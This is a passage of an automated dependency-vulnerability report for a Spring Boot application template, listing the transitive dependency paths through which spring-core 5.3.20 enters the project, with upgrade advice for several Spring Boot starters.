  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-tx@7.0.0-M9 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.data:spring-data-jpa@2.7.2 org.springframework:spring-orm@7.0.0-M9 org.springframework:spring-jdbc@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-devtools@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-devtools@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-config@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.security:spring-security-web@5.7.3 org.springframework.security:spring-security-core@5.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
